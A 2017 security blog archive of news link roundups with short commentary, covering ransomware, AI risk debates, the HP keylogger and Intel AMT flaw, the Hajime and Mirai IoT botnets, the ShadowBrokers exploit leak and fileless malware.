Dark Web Ransomware Economy Growing at an Annual Rate of 2,500%
CryptoLocker. GoldenEye. Locky. WannaCry. It’s no secret that 2017 is shaping up to be the most notorious year on record for ransomware. Even a casual news consumer can identify several, if not all, of the menacing ransomware attacks that have cost worldwide businesses an estimated $1 billion this year. | carbonblack.com


Posted in Uncategorized | Comments Off on Ransomware

Does the Future Need Us?

The Russian president warned that artificial intelligence offers ‘colossal opportunities’ as well as dangers
Putin says the nation that leads in AI ‘will be the ruler of the world’. The Russian president warned that artificial intelligence offers ‘colossal opportunities’ as well as dangers. | theverge.com

Elon Musk: AI ‘vastly more risky than North Korea’
Tesla head warns of dangers of AI and pushes for regulation as OpenAI he backed beats best human players in online DotA 2 championship. | theguardian.com

Why the Future Doesn’t need Us
Why the future doesn’t need us. Our most powerful 21st-century technologies – robotics, genetic engineering, and nanotech – are threatening to make humans an endangered species. A great piece of work from Bill Joy almost 20 years ago originally published in wire magazine – worth the read. | wired.com

Killer robots: World’s top AI and robotics companies urge United Nations to ban lethal autonomous weapons – Future of Life Institute
Press release from Faculty of Engineering at UNSW, Sydney, Australia. Open letter by leaders of leading robotics & AI companies is launched at the world’s biggest artificial intelligence conference as UN delays meeting till later this year to discuss the robot arms race An open letter signed by 116 founders of robotics and artificial intelligence. | furtureoflife.org

Posted in Artificial Intelligence | Comments Off on Does the Future Need Us?

Public Leaks are Not Only a Government Concern

Heaps of Windows 10 internal builds, private source code leak online
Unreleased 64-bit ARM versions, Server editions among dumped data. The data – some 32TB of official and non-public installation images and software blueprints that compress down to 8TB – were uploaded to betaarchive.com | the register.co.uk

Posted in Uncategorized | Comments Off on Public Leaks are Not Only a Government Concern

Stealth tracking, double-agents, and de-bugging gone horribly wrong

Ultrasonic Beacons Are Tracking Your Every Movement
More than 200 Android mobile applications listen surreptitiously for ultrasonic beacons embedded in audio that are used to track users and serve them with targeted advertising. | threatpost.com

[Comment]. SilverPush continues to be installed in apps with millions of downloads. What is most worrisome is that the google requires that developers “disclose how an app collects, uses and shares user data, including the types of parties with whom it’s shared.” Want a more in-depth view? The research paper is available.

‘Crazy bad’ bug in Microsoft’s Windows malware scanner can be used to install malware
Critical update for security engine rushed out the door. | the register.co.uk

[Comment] Say it isn’t so – if Microsoft’s Malware Protection Engine scans a specially crafted file it can allow remote code execution (ironic). Thankfully, Microsoft moved quickly on this with an emergency update. Another ‘win’ for Project Zero.

Beware! Built-in Keylogger Discovered In Several HP Laptop Models
Security researchers discover built-in keylogger in the Conexant High-Definition pre-installed on several Hewlett-Packard (HP) laptop models. | thehackernews.com

[Comment] Why does an audio driver need a key logger? Key strokes recorded and left in cleartext in a file on the device? It smacks of pre-installed spyware.
Posted in Uncategorized | Comments Off on Stealth tracking, double-agents, and de-bugging gone horribly wrong

EPT, Chipsets, and Reroutes

In Defense of Offensive Hacking Tools
8 points in defence of offence. | medium.com

[Comment] The cyber threat landscape has become blurred and is outpacing our ability to adequately quantify the threat. The new reality we currently face is that sophisticated attack tools, exploits, and vulnerability knowledge are all becoming democratized. Let’s call the the Effective Persistent Threat (EPT).

The hijacking flaw that lurked in Intel chips is worse than anyone thought
Patch for severe authentication bypass bug won’t be available until next week. | arstechnia.com

[Comment] Shodan searches show that the number of Internet facing systems with the bug are limited in comparison with the sheer number of devices with this chipset – so it could be much worse. We do need to ask ourselves how something so fundamental in our computing devices could contain such a flaw for so long.

Russian-controlled telecom hijacks financial services’ Internet traffic
Visa, MasterCard, and Symantec among dozens affected by “suspicious” BGP mishap.  | arstechnia.com

[Comment] BGP essential to the Internet but never designed with security in mind. Where have I heard that before. Financial institutions …. sure we have SSL, no problem. How many password resets were done during those seven minutes?
Posted in Musings | Comments Off on EPT, Chipsets, and Reroutes

Elections, Geo-aware malware, and SS7 vs. 2FA

Hackers emit 9GB of stolen Macron ’emails’ two days before French presidential election Hmm, who could possibly do such a thing? | theregister.co.uk

‘Fatboy’ Ransomware Extorts Money Based on Victims’ Countries
Cybersecurity researchers have discovered a new variant of ransomware that automatically adjusts its ransom demand from victims based on their location. Targets in wealthier countries will be forced to pay…  | lifars.com

After years of warnings, mobile network hackers exploit SS7 flaws to drain bank accounts O2 confirms online thefts using stolen 2FA SMS codes. | theregister.co.uk

Posted in Musings | Tagged | Comments Off on Elections, Geo-aware malware, and SS7 vs. 2FA

May 5th, 2017 | The 3Ps: Phishing, Patching, and Passwords

Phishing – Google Docs and New Tactics

Patching – Intel

Passwords – World Password Day + Timely Guidance from NIST

Posted in Uncategorized | Comments Off on May 5th, 2017 | The 3Ps: Phishing, Patching, and Passwords

May 1, 2017 | Threat Reports

DBIR 2017:

Highlights include:

  • 88% of breaches fall into the nine patterns we first identified back in 2014.
  • 95% of phishing attacks that led to a breach were followed by some sort of software installation.
  • In the 2014 DBIR, ransomware was the 22nd most common form of malware. This year it’s number five, and the most common in the Crimeware pattern.

FireEye M-trends:

Highlights include:

  • The global median time from compromise to discovery has dropped significantly from 146 days in 2015 to 99 days 2016.
  • Nation-states continue to set a high bar for sophisticated cyber attacks, but some financial threat actors have caught up to the point where we no longer see the line separating the two.
[Comment] Trends and more trends – I am a big fan of Verizon’s DBIR reports.

Posted in Uncategorized | Comments Off on May 1, 2017 | Threat Reports

April 29, 2017 | Vigilantes, Disclosure fall-out, and Malware Upgrades

Vigilantes – Hajime

Hajime IoT worm fights the Mirai botnet for control of easy-to-hack IoT products. Hajime, like Mirai before it, takes advantage of factory-set (default) username and password combinations to brute-force its way into unsecured devices with open Telnet ports. Analysis from Rapidity Networks is found here.

Related posts.

  • Mirai and Hajime Locked Into IoT Botnet Battle. threatpost
  • Hajime, the mysterious evolving botnet. SecureList
  • Hajime Botnet is Now 300,000-Strong. infosecurity-magazine
  • Hajime Botnet Reaches 300,000 Hosts With No Malicious Functions. darknet
  • A vigilante is putting a huge amount of work into infecting IoT devices. arstechnica
[Comment] We need to ask ourselves: (1) why do we make it so easy for compromises to happen by not bothering to change default passwords/usernames, and (2) telnet! hard-coded passwords! – are you serious, let’s demand more basic security from these IoT products.

Disclosure fall-out – ShadowBrokers

  1. Script kiddie bonanza – exploit code is released and scans show tens of thousands of Windows servers infected with the DoublePulsar kernel exploit.
  2. SWIFT – exploiting global financial messaging, how many service bureaus were compromised?
  3. Microsoft anticipatory patches – how did Microsoft patch so quickly, before the disclosure no less. Did NSA tip Microsoft off on the extent/particulars of the disclosure?
  4. EOL – thousands of vulnerable systems, with no patch available from Microsoft, are now being actively exploited.

Related posts.

  • Leaked NSA Hacking Tools Being Used to Hack Thousands of Vulnerable Windows PCs. thehackernews
  • NSA’S DOUBLEPULSAR Kernel Exploit in use Internet-wide. threatpost
  • Tens of thousands Windows systems implanted with NSA’s DoublePulsar. helpnetsecurity
  • NSA-leaking Shadow Brokers just dumped its most damaging release yet. arstechnia
  • Protecting customers and evaluating risk. Microsoft Technet
  • Microsoft Says It Has Patched Leaked NSA Hacks. Fortune
[Comment] The unintended fallout of this is that a few of these exploits target systems that are EOL. Thus, no patches available. Now you would think that doesn’t matter as – who would still have EOL systems facing the Internet?

Upgrades – Fileless malware

So why is fileless malware so dangerous, and why will it continue to expand for the foreseeable future? In simple terms. It works. Although there are a lot of good malware detection systems that are capable of detecting and controlling fileless malware, most are not.

Related Posts.

  • Hard Target: Fileless Malware. threatpost
  • Why Fileless Malware will Continue Its Rapid Expansion. lastline
  • Will Fileless Malware Push the antivirus Industry into Oblivion? helpnetsecurity
[Comment] Fileless malware is stealthy – techniques such as polymorphism, implanting watchdogs, revoking permissions, are being used in an effort to evade detection. Coupled with leveraging features like Microsoft Windows Management Instrumentation (WMI) and Windows PowerShell in an effort to n=blend into the network noise and compromise endpoints without ever storing a binary on disk, ensuring that attacks remains hard to detect and track.
Posted in Weekly Posts | Comments Off on April 29, 2017 | Vigilantes, Disclosure fall-out, and Malware Upgrades